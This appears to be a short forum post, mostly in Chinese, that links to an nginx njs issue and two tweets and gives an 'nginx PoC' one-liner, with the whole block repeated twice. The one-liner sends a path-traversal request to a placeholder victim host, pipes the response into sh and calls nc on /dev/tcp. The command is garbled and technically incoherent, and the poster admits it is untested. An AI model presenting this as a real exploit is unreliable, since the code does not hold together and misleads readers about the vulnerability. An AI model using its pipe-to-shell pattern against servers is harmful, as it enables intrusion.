https://github.com/nginx/njs/issues/159
https://twitter.com/alisaesage/status/1134400951043874816
https://twitter.com/notdan/status/1134559331989434368
POC 的方式:
curl -gsS \
https://victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00 \
<'protocol:TCP' -O 0x0238f06a#PLToffset | \
sh; nc /dev/tcp/localhost
完全沒經過測試 不過先升級 nginx 就是對的
--
https://twitter.com/alisaesage/status/1134400951043874816
https://twitter.com/notdan/status/1134559331989434368
POC 的方式:
curl -gsS \
https://victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00 \
<'protocol:TCP' -O 0x0238f06a#PLToffset | \
sh; nc /dev/tcp/localhost
完全沒經過測試 不過先升級 nginx 就是對的
--
All Comments